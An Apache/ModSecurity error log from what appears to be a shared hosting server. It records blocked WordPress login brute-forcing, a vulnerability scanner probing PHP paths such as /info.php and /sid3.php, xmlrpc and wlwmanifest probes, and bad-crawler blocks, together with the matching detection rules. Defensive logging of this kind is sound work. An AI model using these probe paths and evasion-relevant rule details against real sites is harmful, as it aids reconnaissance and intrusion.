[Tue May 26 19:46:47.263496 2026] [security2:error] [pid 77894:tid 78147] [client 20.226.60.108:6736] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/classwithtostring.php"] [unique_id "ahWrTzomEhVPuJoD1MZvUQAAAHs"]
[Tue May 26 19:46:47.661191 2026] [security2:error] [pid 77894:tid 77961] [remote 92.205.188.156:53418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWrTzomEhVPuJoD1MZvYAAAIEI"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:46:47.857979 2026] [security2:error] [pid 77894:tid 78140] [client 20.226.60.108:13533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/info.php"] [unique_id "ahWrTzomEhVPuJoD1MZvZAAAAHQ"]
[Tue May 26 19:46:47.858080 2026] [security2:error] [pid 77894:tid 78140] [client 20.226.60.108:13533] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/info.php"] [unique_id "ahWrTzomEhVPuJoD1MZvZAAAAHQ"]
[Tue May 26 19:46:48.305714 2026] [security2:error] [pid 77894:tid 78027] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrTzomEhVPuJoD1MZvZwAAAAM"]
[Tue May 26 19:46:49.371713 2026] [security2:error] [pid 77894:tid 78140] [client 20.226.60.108:14260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/ioxi-o.php"] [unique_id "ahWrUTomEhVPuJoD1MZvnQAAAHQ"]
[Tue May 26 19:46:49.371837 2026] [security2:error] [pid 77894:tid 78140] [client 20.226.60.108:14260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/ioxi-o.php"] [unique_id "ahWrUTomEhVPuJoD1MZvnQAAAHQ"]
[Tue May 26 19:46:50.359395 2026] [security2:error] [pid 77894:tid 78008] [remote 34.150.193.178:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kingsclub.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWrUjomEhVPuJoD1MZvugAADXE"]
[Tue May 26 19:46:50.672761 2026] [security2:error] [pid 77894:tid 77988] [remote 34.150.193.178:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.193.150.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahWrUjomEhVPuJoD1MZvwAAAZ10"]
[Tue May 26 19:46:51.174844 2026] [security2:error] [pid 77894:tid 78046] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrUjomEhVPuJoD1MZvzAAAABY"]
[Tue May 26 19:46:52.213050 2026] [security2:error] [pid 77894:tid 77999] [remote 34.150.193.178:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.193.150.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahWrVDomEhVPuJoD1MZv-wAAamg"]
[Tue May 26 19:46:52.213278 2026] [security2:error] [pid 77894:tid 78130] [client 34.150.193.178:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahWrVDomEhVPuJoD1MZv-wAAamg"]
[Tue May 26 19:46:53.939285 2026] [security2:error] [pid 77894:tid 77895] [remote 222.165.190.235:42018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWrVTomEhVPuJoD1MZwMgAAYQA"]
[Tue May 26 19:46:53.974510 2026] [security2:error] [pid 77894:tid 78028] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrVTomEhVPuJoD1MZwKgAAAAQ"]
[Tue May 26 19:46:54.333912 2026] [security2:error] [pid 77894:tid 77997] [remote 64.31.25.250:46846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrVjomEhVPuJoD1MZwPgAAP2Y"]
[Tue May 26 19:46:54.435593 2026] [security2:error] [pid 77894:tid 78001] [remote 222.165.190.235:42018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWrVjomEhVPuJoD1MZwQgAAO2o"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:46:55.054054 2026] [security2:error] [pid 77894:tid 78002] [remote 64.31.25.250:46846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.25.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrVjomEhVPuJoD1MZwWQAAOGs"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:46:55.331296 2026] [security2:error] [pid 77894:tid 78032] [client 20.226.60.108:13957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/011i.php"] [unique_id "ahWrVzomEhVPuJoD1MZwYwAAAAg"]
[Tue May 26 19:46:55.331399 2026] [security2:error] [pid 77894:tid 78032] [client 20.226.60.108:13957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/011i.php"] [unique_id "ahWrVzomEhVPuJoD1MZwYwAAAAg"]
[Tue May 26 19:46:55.883025 2026] [security2:error] [pid 77894:tid 78129] [client 20.226.60.108:26643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/edit.php"] [unique_id "ahWrVzomEhVPuJoD1MZwdAAAAGk"]
[Tue May 26 19:46:55.883125 2026] [security2:error] [pid 77894:tid 78129] [client 20.226.60.108:26643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/edit.php"] [unique_id "ahWrVzomEhVPuJoD1MZwdAAAAGk"]
[Tue May 26 19:46:56.371643 2026] [security2:error] [pid 77894:tid 78060] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrVzomEhVPuJoD1MZwegAAACQ"]
[Tue May 26 19:46:57.338250 2026] [security2:error] [pid 77894:tid 78106] [client 20.226.60.108:15480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/sid3.php"] [unique_id "ahWrWTomEhVPuJoD1MZwqgAAAFI"]
[Tue May 26 19:46:57.338341 2026] [security2:error] [pid 77894:tid 78106] [client 20.226.60.108:15480] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/sid3.php"] [unique_id "ahWrWTomEhVPuJoD1MZwqgAAAFI"]
[Tue May 26 19:46:59.691960 2026] [security2:error] [pid 77894:tid 78044] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrWzomEhVPuJoD1MZw7QAAABQ"]
[Tue May 26 19:47:00.053114 2026] [security2:error] [pid 77894:tid 78091] [client 20.226.60.108:15054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/load.php"] [unique_id "ahWrXDomEhVPuJoD1MZxAQAAAEM"]
[Tue May 26 19:47:00.053220 2026] [security2:error] [pid 77894:tid 78091] [client 20.226.60.108:15054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/load.php"] [unique_id "ahWrXDomEhVPuJoD1MZxAQAAAEM"]
[Tue May 26 19:47:00.222778 2026] [security2:error] [pid 77894:tid 78054] [client 185.191.171.17:23786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahWrXDomEhVPuJoD1MZxCAAAAB4"]
[Tue May 26 19:47:00.222934 2026] [security2:error] [pid 77894:tid 78054] [client 185.191.171.17:23786] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahWrXDomEhVPuJoD1MZxCAAAAB4"]
[Tue May 26 19:47:01.474415 2026] [security2:error] [pid 77894:tid 78097] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrXTomEhVPuJoD1MZxHgAAAEk"]
[Tue May 26 19:47:04.318089 2026] [security2:error] [pid 77894:tid 78130] [client 20.226.60.108:12776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/166.php"] [unique_id "ahWrYDomEhVPuJoD1MZxdQAAAGo"]
[Tue May 26 19:47:04.318279 2026] [security2:error] [pid 77894:tid 78130] [client 20.226.60.108:12776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/166.php"] [unique_id "ahWrYDomEhVPuJoD1MZxdQAAAGo"]
[Tue May 26 19:47:04.637126 2026] [fcgid:warn] [pid 77894:tid 78042] (70014)End of file found: [client 66.132.195.108:2426] mod_fcgid: can't get data from http client
[Tue May 26 19:47:04.960804 2026] [security2:error] [pid 77894:tid 78060] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrYDomEhVPuJoD1MZxewAAACQ"]
[Tue May 26 19:47:06.986325 2026] [security2:error] [pid 77894:tid 78017] [remote 211.23.42.84:44408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.42.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrYjomEhVPuJoD1MZxuwAAD3o"]
[Tue May 26 19:47:07.229886 2026] [security2:error] [pid 77894:tid 78076] [client 14.191.120.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrYjomEhVPuJoD1MZxugAAADQ"]
[Tue May 26 19:47:07.260821 2026] [security2:error] [pid 77894:tid 78049] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrYjomEhVPuJoD1MZxwAAAABk"]
[Tue May 26 19:47:07.456418 2026] [security2:error] [pid 77894:tid 77925] [remote 211.23.42.84:44408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.42.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrYzomEhVPuJoD1MZx1wAAHB4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:47:07.554424 2026] [security2:error] [pid 77894:tid 78114] [client 114.119.138.36:49655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWrYzomEhVPuJoD1MZx2QAAAFo"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-08-15
[Tue May 26 19:47:09.025137 2026] [security2:error] [pid 77894:tid 77927] [remote 54.36.102.244:45800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahWrZDomEhVPuJoD1MZyCwAATyA"]
[Tue May 26 19:47:10.065175 2026] [security2:error] [pid 77894:tid 78129] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrZTomEhVPuJoD1MZyHgAAAGk"]
[Tue May 26 19:47:10.445139 2026] [security2:error] [pid 77894:tid 78069] [client 20.226.60.108:12489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unstumbled.moes-art.com"] [uri "/load.php"] [unique_id "ahWrZjomEhVPuJoD1MZyOQAAAC0"]
[Tue May 26 19:47:10.445263 2026] [security2:error] [pid 77894:tid 78069] [client 20.226.60.108:12489] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "unstumbled.moes-art.com"] [uri "/load.php"] [unique_id "ahWrZjomEhVPuJoD1MZyOQAAAC0"]
[Tue May 26 19:47:12.007588 2026] [security2:error] [pid 77894:tid 78144] [client 216.213.26.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrZzomEhVPuJoD1MZybwAAAHg"], referer: https://anujtradingco.com
[Tue May 26 19:47:12.115124 2026] [security2:error] [pid 77894:tid 78146] [client 149.88.106.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWrZzomEhVPuJoD1MZyawAAAHo"]
[Tue May 26 19:47:12.558989 2026] [security2:error] [pid 77894:tid 78121] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWraDomEhVPuJoD1MZydQAAAGE"]
[Tue May 26 19:47:13.292993 2026] [fcgid:warn] [pid 77894:tid 78065] (70014)End of file found: [client 199.45.154.134:38616] mod_fcgid: can't get data from http client
[Tue May 26 19:47:13.857424 2026] [autoindex:error] [pid 77894:tid 78048] [client 31.220.88.107:55688] AH01276: Cannot serve directory /home2/abili6ui/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:47:14.340373 2026] [security2:error] [pid 77894:tid 77949] [remote 92.117.185.70:63265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWrajomEhVPuJoD1MZyvgAAfTY"]
[Tue May 26 19:47:15.054252 2026] [security2:error] [pid 77894:tid 78040] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrajomEhVPuJoD1MZyxQAAABA"]
[Tue May 26 19:47:17.697738 2026] [security2:error] [pid 77894:tid 78138] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrbTomEhVPuJoD1MZzIwAAAHI"]
[Tue May 26 19:47:20.188753 2026] [security2:error] [pid 77894:tid 77962] [remote 154.66.198.148:13138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrcDomEhVPuJoD1MZzgAAAL0M"]
[Tue May 26 19:47:20.430891 2026] [security2:error] [pid 77894:tid 78142] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrcDomEhVPuJoD1MZzgwAAAHY"]
[Tue May 26 19:47:21.128752 2026] [autoindex:error] [pid 77894:tid 78032] [client 43.135.148.92:60434] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:47:22.287521 2026] [security2:error] [pid 77894:tid 78140] [client 185.165.240.73:18464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWrcTomEhVPuJoD1MZzsAAAAHQ"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:47:23.270009 2026] [security2:error] [pid 77894:tid 78088] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrcjomEhVPuJoD1MZz1QAAAEA"]
[Tue May 26 19:47:23.936456 2026] [security2:error] [pid 77894:tid 78008] [remote 20.153.140.50:46182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWrczomEhVPuJoD1MZz9AAAIHE"]
[Tue May 26 19:47:24.098977 2026] [security2:error] [pid 77894:tid 78136] [client 66.132.195.108:9068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWrczomEhVPuJoD1MZz8AAAAHA"]
[Tue May 26 19:47:24.956916 2026] [security2:error] [pid 77894:tid 77988] [remote 102.164.188.174:26665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/compta/bank/various_payment/card.php"] [unique_id "ahWrdDomEhVPuJoD1MZ0EQAAe10"], referer: https://erp.azurmediatec.com/compta/bank/various_payment/card.php?id=294&action=clone
[Tue May 26 19:47:25.584323 2026] [security2:error] [pid 77894:tid 78127] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrdTomEhVPuJoD1MZ0IAAAAGc"]
[Tue May 26 19:47:26.263885 2026] [security2:error] [pid 77894:tid 77999] [remote 20.153.140.50:46182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWrdjomEhVPuJoD1MZ0TQAAFGg"], referer: https://dimensioncorporativa.com.co/wp-login.php
[Tue May 26 19:47:26.993110 2026] [security2:error] [pid 77894:tid 78151] [client 85.204.70.118:48374] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWrdjomEhVPuJoD1MZ0agAAAH8"]
[Tue May 26 19:47:27.430431 2026] [security2:error] [pid 77894:tid 78131] [client 85.204.70.118:48386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWrdzomEhVPuJoD1MZ0eQAAAGs"]
[Tue May 26 19:47:27.497139 2026] [security2:error] [pid 77894:tid 78043] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrdzomEhVPuJoD1MZ0bQAAABM"]
